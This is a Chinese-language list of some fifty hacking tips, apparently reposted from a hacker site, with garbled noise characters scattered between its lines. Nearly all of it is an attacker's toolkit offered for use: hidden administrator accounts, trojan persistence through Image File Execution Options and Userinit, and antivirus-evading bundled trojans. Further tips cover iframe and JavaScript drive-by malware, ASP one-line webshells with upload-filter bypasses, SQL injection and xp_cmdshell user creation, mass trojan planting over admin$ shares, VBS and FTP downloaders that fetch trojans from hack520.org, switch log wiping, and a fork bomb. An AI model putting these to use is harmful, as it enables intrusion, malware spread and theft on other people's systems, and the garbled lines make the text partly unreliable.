1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
. W- A7 q J# D zcacls C:\windows\system32 /G hqw20:R
1 `9 H1 V4 n; V# c2 Q/ |2 O( v思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入* J( l$ u+ X5 C, R3 H, @6 j0 O+ _
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
$ H4 y7 c1 T3 x8 v, w# G. i4 f' d, ~; L' w
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。6 ?( d7 Q) u; Y; p, a0 B$ l& i7 V r( q
2 h( j t9 _+ y) z& }2 a: |
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
, T- Z9 u3 M& {
0 `6 D' z7 r5 P7 _" G4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号) T' ~! S6 Y/ a6 N$ H
+ f# Q6 \2 _( a. D' g! K% q5、利用INF文件来修改注册表! ^& b$ ?( y/ l J% e
[Version], o, d3 ~2 O- C% g3 w1 G
Signature="$CHICAGO$"( w2 z7 q6 f M5 n9 A
[Defaultinstall]
1 n% L3 y5 u- B3 `addREG=Ating
$ J- o; o# } g+ m8 A[Ating]& h6 X) k+ ~- P7 i% r% G( M. {
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
: B3 `5 F& D0 \2 R6 T) Z$ ?以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:3 }( \ O( z' w, C. |( i
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
' j1 H3 ] g$ o, _, H) Q其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
U) e- q! v0 [0 t, ^* `HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
9 b% h B7 L! I' r; y+ OHKEY_CURRENT_CONFIG 简写为 HKCC
+ c4 I& e$ {* U. F/ k, ?) d1 B3 F0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值3 M/ @) o6 Y9 G/ P- E% N
"1"这里代表是写入或删除注册表键值中的具体数据- u+ ~# b; W( `" N* s3 ^
. B# i! d s9 _& j e- x) U6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,4 W0 H7 |+ M) i. s& [
多了一步就是在防火墙里添加个端口,然后导出其键值
6 C, i* E% E8 G[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]. z7 L# a9 O: M( j' [' V4 w; ^
" h- t) C0 B+ S$ ?4 [& ?4 s7 A$ ~
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽' n Q/ N0 N6 T8 m- l6 a! Y
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
3 }8 G" S- i" d' F2 a3 R8 b2 Q2 E6 G, `5 b# ?8 N8 e
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
& s9 Q; Y' w& u: \9 a3 b+ S- ?9 ~8 B' @. o: I
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,$ `) N- r* m& k9 M2 Z5 x8 {
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。( ~( y0 a" x# _1 [8 _) V
( o* j0 i8 H3 @8 x& X$ e) i; D
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
. N" O ?) e" R; p
6 A7 Q) M h; t: o" S- }- Y8 D11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,. b. t$ C+ `! W
用法:xsniff –pass –hide –log pass.txt; D P+ G, q, ^0 h
0 a j+ O' K5 l! V% b6 S. z9 K
12、google搜索的艺术& G* r3 A+ }: y
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
' c2 `6 M/ J" _, ~; Z0 j8 \或“字符串的语法错误”可以找到很多sql注入漏洞。
4 {4 ^3 q9 h; {2 k U- ?6 g, I% \% g& l# s- H
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
, ~8 d: d! ^% h" B% Y# n2 V) j n
14、cmd中输入 nc –vv –l –p 1987
|/ X; n+ I6 u( a" m做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
7 N. @; _1 m1 ]/ C4 f8 E' M4 T1 }( V% P- C9 k$ u
15、制作T++木马,先写个ating.hta文件,内容为
9 |. _; {% f6 a& F' w<script language="VBScript">$ g" N: P6 U1 m5 E) ]7 X; j
set wshshell=createobject ("wscript.shell" )+ r2 o: W- Y8 v
a=wshshell.run("你马的名称",1)
6 _, s% ~7 M3 w, L* |window.close$ Q5 W8 L5 i. v( [7 G. ]
</script>
7 u1 l7 Z! x' W再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。! |) e- S2 `* n
2 b1 X! }7 F% _7 O' Z l16、搜索栏里输入
8 c% {2 T# o$ a# Y; E, b& ?0 v- c关键字%'and 1=1 and '%'='
% J+ [! t" B: b: t& V5 X, [. L关键字%'and 1=2 and '%'='
7 L4 X' j: d, a比较不同处 可以作为注入的特征字符
* k; o7 h! _, I; i/ f8 ?9 M% n( _; e% _) P: `- u3 [
17、挂马代码<html>
0 o- j7 S$ @8 P& n8 ?2 d8 U( S1 d<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>% _" V8 s" B& Z" Y: n
</html>
2 x0 I) @, N' v g- p; ^# N( Y/ N( p& ~& D6 g5 b ^$ g
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
( y) {( m3 {( ~. ^2 wnet localgroup administrators还是可以看出Guest是管理员来。* c1 ~) a3 Z1 z0 E: f% U( G1 N
; a$ H# I- [: |: H9 l( X) K
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等: T+ k; i/ ` e0 u+ Y
用法: 安装: instsrv.exe 服务名称 路径8 \& p( z$ V9 {6 @0 `* b+ V( z
卸载: instsrv.exe 服务名称 REMOVE
/ h2 W1 A; v' f W5 e8 \- N2 l' d
( E6 r# i, d8 _& ~2 ^/ o! A0 ^, z% M
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉" v, m" L3 V o1 t
不能注入时要第一时间想到%5c暴库。0 m5 ^4 w+ }3 R6 n# Z
0 ?" n d( |! J- G- G1 d6 V22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~2 {7 b7 q0 T4 F7 ?) O- ]6 ^ J5 H
2 @! n; n/ W" H6 u* L
23、缺少xp_cmdshell时2 D4 O5 [7 ?$ q
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
/ ?! I, z' X1 G* T4 N假如恢复不成功,可以尝试直接加用户(针对开3389的)
9 v. z2 `' L+ jdeclare @o int
7 {$ x$ |; F% o6 d7 Uexec sp_oacreate 'wscript.shell',@o out
0 Q, U; ]* R5 G' y7 Z! Gexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
- ^+ ~5 _& a5 s' k7 ?$ U+ E( z
7 y8 p+ o- W; P& b/ p- U24.批量种植木马.bat; f" ?. ]/ R+ A/ _
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中- C/ r' b) x3 Z9 I
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
9 Q: }# ?5 Q( C. |- A, |6 q3 ?" g. N扫描地址.txt里每个主机名一行 用\\开头. a. c4 O; j3 X: E$ K# r H7 g
1 b! c+ Y; @1 K" g L& ]1 C* G. k' i
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
* w; b& b& b" I( M$ g2 a5 J$ ?$ C$ Y
) @5 x' j3 b' l1 m0 N+ m: @26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
+ `, B4 h% [' B将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
3 l j5 d' O2 ?, c* ?.cer 等后缀的文件夹下都可以运行任何后缀的asp木马" X6 [6 [- F' J2 R% j F
) @: \+ i* x2 c27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP! e/ D) P1 k& {2 H4 d" Y* p
然后用#clear logg和#clear line vty *删除日志2 }! {, p( J0 ? P% q) E+ W
1 d- ~& H y8 z9 x- l2 |
28、电脑坏了省去重新安装系统的方法
; Q6 y% i- H+ _) b) b6 G# g, w纯dos下执行,! @( g4 @3 A! E& Q' J2 R
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config& y+ j v2 M( `" q( T/ n: R5 B
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config# R/ ]" d# R, ~) |$ ~2 d7 J: B: |; q; o
2 ~( |6 l# d8 M, R29、解决TCP/IP筛选 在注册表里有三处,分别是:
; ~9 `# S# o( x( t7 a; vHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip. ?7 g4 d7 \2 h) m+ _0 M" Q( a
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
7 \" a2 ^% O8 d0 @/ QHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip( g( w" w6 a' a& a) p
分别用! v. \1 F, e, p5 t7 I
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip* [0 U& I1 z8 ]& G5 V
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
. {/ q$ t* Y/ d, \! W5 Y1 Vregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip, m( C0 P7 W' F9 M2 f
命令来导出注册表项" P- v* O/ I1 a7 n! N
然后把三个文件里的EnableSecurityFilters"=dword:00000001,3 J9 J" X6 m% L) K
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用# Z2 M1 x. j1 ]$ f6 q2 {( K
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。* w! M: C/ L; Z, M" a* @% v
- K# S! x, @: u% I. y6 j# N( {& z30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
0 K' _4 `# v: C( w3 F4 g4 bSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的33 k/ y+ E/ h/ n" g% n3 f0 S
5 Z2 ~6 p# i5 K4 X& G5 z
31、全手工打造开3389工具# p3 {1 ?) j7 r& e
打开记事本,编辑内容如下:
4 B+ F, ?, A% x) Oecho [Components] > c:\sql% Q# l5 o4 U& Q, D) |8 A3 M( G N# T
echo TSEnable = on >> c:\sql3 y: [" T2 T3 u( K7 k
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
" I" I: I$ N" Q编辑好后存为BAT文件,上传至肉鸡,执行
( X. X( N. n$ k$ g( i# k% C0 ~9 o
. Y0 E% M( R8 ?1 { z32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马 B3 b5 p4 O" _8 ?" g) K
: x+ e3 p# r3 h& ?$ l33、让服务器重启9 V' r- P. F4 z& g7 }
写个bat死循环:/ e; ?. \8 t, p# R
@echo off) r0 V: |9 _" w+ r/ l
:loop1
2 p, a: Q7 K1 v# @, t: o {cls' A- g0 J- d6 z& g: j; }/ j
start cmd.exe6 q S+ d2 {$ f9 {9 ]
goto loop1
& Z9 U( H% y: D& \保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
5 e/ p0 n9 W8 F% G) W" ?5 F% r# i( S; |& Z
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
+ o2 ^, q$ \+ @; I* k6 |@echo off
, I. }# ~0 m6 h" f. zdate /t >c:/3389.txt
( W) H% N, v( B' Otime /t >>c:/3389.txt0 |( {( q& ^: P; @
attrib +s +h c:/3389.bat
- l* r; f) {$ O4 s3 [- Aattrib +s +h c:/3389.txt% x" p' x1 t9 K/ W# G: V
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt8 }0 g' G, x0 ^
并保存为3389.bat
' r+ P6 _; v+ o n打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
/ i9 F, |& s. i# w8 U. a+ H3 E
, k" A' X1 R9 L0 Y- {35、有时候提不了权限的话,试试这个命令,在命令行里输入:
" |6 Y( r7 \/ e/ Q' R' u, f' Tstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)1 K4 r; z+ n' U' r
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
/ v! W, x6 T/ |2 j0 F7 Y% ^2 g9 |% T' m$ P; Y0 d1 F
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
. y: V7 p4 i J/ q) h) R Q0 `echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
3 h8 |9 m2 C- k: y3 pecho 你的FTP账号 >>c:\1.bat //输入账号
" e( R: u2 ^9 q. q* Y7 A+ Decho 你的FTP密码 >>c:\1.bat //输入密码
# _/ L4 h, o5 M2 t! X9 ?# decho bin >>c:\1.bat //登入3 s% A& T% c9 X. H/ _2 A5 n5 Q4 }8 }
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
. u! |: p4 z* F oecho bye >>c:\1.bat //退出* o7 f9 x" i5 h! |" t0 }! `: l
然后执行ftp -s:c:\1.bat即可
( N, X2 }" Q& N" I% T
5 G; v0 g6 r+ K, V! |37、修改注册表开3389两法
/ u/ v. h5 _* C6 y8 H; [(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表$ \0 B0 n7 ]5 ~
echo Windows Registry Editor Version 5.00 >>3389.reg) x, y. ?( R6 U" R$ o' E3 s0 `( y: l
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg6 x" @& U9 J0 m2 t! @" P; L
echo "Enabled"="0" >>3389.reg
) K' @! g3 E: E* i% l' u- I& Zecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
% S" Q7 M, p0 d5 b5 p; C; JNT\CurrentVersion\Winlogon] >>3389.reg
# U R0 R( f" Z) k( C0 Secho "ShutdownWithoutLogon"="0" >>3389.reg
$ V; T2 q6 \0 E7 L1 ^echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]' a0 b! @' q; m" f5 g7 A
>>3389.reg# S5 i2 E; Y( T5 [2 U6 a3 o/ R9 X
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
# `3 ~2 c2 N4 B6 k1 ?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]0 J, J }6 y2 ^, u
>>3389.reg
4 c4 S4 Q0 R& v& ?, l, E2 Y, kecho "TSEnabled"=dword:00000001 >>3389.reg
8 }) p# |4 K* k2 Y0 ?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
" P6 [) R4 t8 l( X& J: M8 u r. Mecho "Start"=dword:00000002 >>3389.reg! x9 M+ a. m$ G" P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]6 g9 R# n8 Z& L/ b
>>3389.reg5 t" H* F& P B, o. r% @% _ b
echo "Start"=dword:00000002 >>3389.reg
9 P, i0 c1 Z! V1 B2 M; x% e; cecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg8 E9 k5 \" P+ ]4 u/ A8 g* O" C9 R
echo "Hotkey"="1" >>3389.reg% F2 r/ D7 u) V4 I, \, `. V/ {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% x, R$ ?$ o2 B; J. i$ D, a) TServer\Wds\rdpwd\Tds\tcp] >>3389.reg
: Z2 ]% ~ i+ Y I% _echo "PortNumber"=dword:00000D3D >>3389.reg; x$ I' Q1 k4 j& l" l; a, _
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal3 y7 n; A n" A: [3 Z) j
Server\WinStations\RDP-Tcp] >>3389.reg
" w5 n9 I$ \2 O- O& D+ B, `echo "PortNumber"=dword:00000D3D >>3389.reg, O! X# g4 @* [2 e" p& b G
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。& T' t! K Y" R1 m D. g2 d
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)$ y2 v5 H+ G4 x0 I; ?; B
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效$ [2 @6 \; s; f7 F$ u
(2)winxp和win2003终端开启
* i" o B+ B. }8 ]; s3 T用以下ECHO代码写一个REG文件:* j/ b5 ^ E$ G! V$ g4 |% G
echo Windows Registry Editor Version 5.00>>3389.reg
1 |4 F2 B# A2 r- T" @0 Decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, y" h& _ O. {9 `: {Server]>>3389.reg6 a1 @ z! y7 t' F# V
echo "fDenyTSConnections"=dword:00000000>>3389.reg
; B2 v. R. K z* o+ secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal3 k+ \! }4 N8 C( {
Server\Wds\rdpwd\Tds\tcp]>>3389.reg9 V* f% H& Y8 S, v
echo "PortNumber"=dword:00000d3d>>3389.reg" g( T/ J+ c! g/ e+ ^ h3 }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" x. B+ L* z5 G7 D' E3 e- Q
Server\WinStations\RDP-Tcp]>>3389.reg! ?* D0 a3 D/ c( z+ v3 y
echo "PortNumber"=dword:00000d3d>>3389.reg! a8 @7 B% G& L* U& _# A( X/ M
然后regedit /s 3389.reg del 3389.reg1 \& Q/ {# O. p; I0 A2 p
XP下不论开终端还是改终端端口都不需重启, t$ w& y; R: a
7 Y& W$ g; S P! t38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃* z% p0 }8 t+ j; B4 M
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
* Z O9 M8 \3 Y9 r9 V& k f9 s4 O; h" u. [6 @" _# p
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
3 M9 o! A! D! z9 v0 t$ j2 i/ v(1)数据库文件名应复杂并要有特殊字符: n2 P4 g, o6 u7 y2 ?5 o
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
) C2 [/ ]& R% q, u. S将conn.asp文档中的
2 h; E/ m; w& [" b, w+ U% O( ]DBPath = Server.MapPath("数据库.mdb")
8 o) ]! _7 p3 mconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath. _; B4 S- c" B: m# R
6 P0 c2 }# J% K/ W/ d
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置. Q3 c* v7 b+ b0 z! b" n
(3)不放在WEB目录里
2 Y% H/ { ^( ?& c. a- z7 u$ v) D" y$ B( T$ J
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
# Y/ i0 H) D5 L* L9 h3 t' V可以写两个bat文件' n6 T& \6 O' I+ B+ ]
@echo off9 y5 \) l2 {7 L) S* B; o1 Z
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
! X1 u* W; p- X/ B0 `@del c:\winnt\system32\query.exe
" ^9 Z6 x! k3 t" \@del %SYSTEMROOT%\system32\dllcache\query.exe
9 t& _, _ r; U6 s% I@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
z3 Z) C( i8 n' e1 t6 c
3 q2 ] q* l6 W- }7 p@echo off- X+ j g F3 @7 @% W1 M* A
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe/ ]8 z8 m. [ X" Q4 c: l- O8 U
@del c:\winnt\system32\tsadmin.exe* R8 l9 |1 |( P/ D5 c
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
4 N0 { C2 | T1 k9 u, Z; C9 H
$ s/ D: W6 N, h9 D7 D A# D# d41、映射对方盘符
+ G4 g- Y' @. F5 l% n. w: Vtelnet到他的机器上, A+ h% w4 _- _- {
net share 查看有没有默认共享 如果没有,那么就接着运行( u) [+ n, T& e3 {) D# T- r% P
net share c$=c:/ ^7 h2 e8 i; P$ S$ h* f
net share现在有c$
! C' E" w* P1 x% r* N6 o在自己的机器上运行/ f! \( |! O/ D. n; D7 v, O) v
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
! T' a: }9 b& c: e0 e: P& s1 P# S, V8 e8 L1 R$ A
42、一些很有用的老知识# W- A; |) H8 `1 F
type c:\boot.ini ( 查看系统版本 )1 D+ ?& O2 q/ {
net start (查看已经启动的服务)
& W+ X/ s5 k" x. c) Yquery user ( 查看当前终端连接 )
+ g. S# b' I, P3 n, F6 Z# Jnet user ( 查看当前用户 )# |" f$ u( D6 P2 n" _+ }# N- }+ F
net user 用户 密码/add ( 建立账号 )
& G: K: E( t! e; Pnet localgroup administrators 用户 /add (提升某用户为管理员)
9 {- B" O; M& X1 lipconfig -all ( 查看IP什么的 )
4 ], j8 E' V# R& k5 h% a' snetstat -an ( 查看当前网络状态 )+ G/ C- g6 ~8 G4 c4 K. {2 w
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)2 ?9 S! C1 b' e
克隆时Administrator对应1F4
! p, ? H; y/ lguest对应1F5
& d: L+ M" ?9 m- itsinternetuser对应3E8
r; D# L5 s5 |; z7 f( P
+ D! v8 C& y( G43、如果对方没开3389,但是装了Remote Administrator Service
/ |6 n. l& @: f4 W7 z5 u" K用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接3 z8 C V% |& y2 t0 t; S. ?/ Y
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
0 l n2 }' Z. P, v0 _3 z0 y先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
# a* n. |2 i; ^$ r0 Z) y& w* C
4 h0 k5 \) g4 V3 t7 R44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)* k9 B0 x! C- n8 e
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)9 x9 P/ p% r- E3 |8 \2 X$ r3 N
$ m5 w' w0 a* u2 V* e b0 v; f# u+ A6 }45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)! X( A' U$ c; l# }/ D
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open3 P3 [+ s, A: U2 K
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
3 D. k) n1 t$ C$ f- T0 I6 F5 b! a6 GCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =% x" D/ r( z( _8 S' r& Q
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs; Z8 B1 X; l, v+ t0 ?9 z+ w( J& ^
(这是完整的一句话,其中没有换行符)/ n- }/ P" G1 N0 {% B
然后下载:' Z/ J" w3 y7 [: u
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
/ _5 i# t- w$ R( p: F9 D8 o, V+ |$ b7 s' G* w+ N4 j/ l
46、一句话木马成功依赖于两个条件:1 H: K; d2 c7 }! K- w* _
1、服务端没有禁止adodb.Stream或FSO组件
2 m7 L% \' U. |; y/ }2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
! I7 u1 W8 S" f4 C& F, h; e7 K8 S$ I# \
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
1 U( J: ` U+ U; I' k+ w;alter database utsz set RECOVERY FULL--
. d$ i8 V+ a, \2 b;create table cmd (a image)--
' P$ }' V! B; \- B; E3 q$ S;backup log utsz to disk = 'D:\cmd' with init--
! ~0 \9 `" }. N# T) ~5 T% Y) Z6 `;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
- ~' |" F& W1 T) F! y4 O$ L/ i" C;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
5 z/ M: f9 q1 @9 R注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。! w. K. {7 Y6 \
* |2 m5 W: w0 F5 X o
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
9 x1 v% a' p& J. I1 i' g! t2 }$ W3 U. b
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options3 L \2 _" H7 e- Z9 J4 ~
所有会话用 'all'。
, X4 N8 x9 v; J9 U6 g: n( T-s sessionid 列出会话的信息。
, m- i" e1 x1 i9 q% O+ @7 l" E-k sessionid 终止会话。. g# A7 x/ A/ z1 S& @4 C p; |0 u+ f
-m sessionid 发送消息到会话。0 }# f' s" H9 W t' W0 L
. G v d. f' B
config 配置 telnet 服务器参数。
) s4 A9 P4 N. @ {
, d, D& a ], F! jcommon_options 为:, E( q% e9 D e8 m) h7 ^
-u user 指定要使用其凭据的用户
+ _0 |& N: c+ d$ z9 @ Y" H% q-p password 用户密码+ y. f$ ^, x# ]: t2 M- T
$ j* y% n- m% w1 |
config_options 为:9 i4 c, |. d1 w) K
dom = domain 设定用户的默认域
2 i! d1 k" o9 m) X7 Xctrlakeymap = yes|no 设定 ALT 键的映射
5 Q& \; h1 B# ]/ A! j; ?$ ?timeout = hh:mm:ss 设定空闲会话超时值- n# Z& o" L: P
timeoutactive = yes|no 启用空闲会话。: c8 f0 b0 ^& B. j+ z% b2 L
maxfail = attempts 设定断开前失败的登录企图数。. i& ?, J- {* h+ c& T
maxconn = connections 设定最大连接数。
9 E- v. |2 Y9 o9 H8 f2 F: Y9 Wport = number 设定 telnet 端口。
4 o- C& G% Z9 D, Hsec = [+/-]NTLM [+/-]passwd. f" V! O; E7 ]% m6 Z! T5 Q$ b
设定身份验证机构8 h$ P4 I- x0 d# v2 i
fname = file 指定审计文件名。0 j. }. z7 {6 g. x. t! R8 N
fsize = size 指定审计文件的最大尺寸(MB)。
' E1 B7 k/ o4 vmode = console|stream 指定操作模式。5 y' w# q, b* t9 @% w" ? A
auditlocation = eventlog|file|both
5 J, q% t9 s( W: R( M% n$ R指定记录地点" p0 t( j4 ^. l( h: W8 l6 ^, V
audit = [+/-]user [+/-]fail [+/-]admin
5 `. K, U. `2 w3 u; b% @2 x
0 {' B/ } @* N' N49、例如:在IE上访问:! a2 j! D- i- p0 p4 f1 p" U
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/. d* P: M/ q8 o2 O, f
hack.txt里面的代码是:
7 j" W! D# y! S& L<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">9 m9 c1 C+ v, e" P
把这个hack.txt发到你空间就可以了!3 t2 v0 P/ V/ [1 o
这个可以利用来做网马哦!% g7 I% j6 i! O! y/ H+ @1 P( I
8 D7 `& g' e; ]1 s: \8 m50、autorun的病毒可以通过手动限制!9 T7 S: K, V( F
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!& u& l; N3 \% Q2 X9 \
2,打开盘符用右键打开!切忌双击盘符~# L& F' e( b/ r; Q
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
, r! F* X; g) g' l, g5 d; p5 Z& E1 ?4 e2 I% }- q7 J1 N, D- U7 {, Q
51、log备份时的一句话木马:
& N; P, K; b9 n7 i& N J- Ka).<%%25Execute(request("go"))%%25>) t7 d2 p& }( f. K+ h& d3 T: ?! b
b).<%Execute(request("go"))%>- ~( O6 v" \5 Y
c).%><%execute request("go")%><%
5 g. W! {9 _# J: @+ A2 }0 Id).<script language=VBScript runat=server>execute request("sb")</Script>
* S( u5 x8 d( w6 I3 u1 o" ue).<%25Execute(request("l"))%25>! O. W" R# D" _# {5 G
f).<%if request("cmd")<>"" then execute request("pass")%>
# O; z' K- O" @" p: W- _6 e' L4 x( q0 ^7 G& g. F
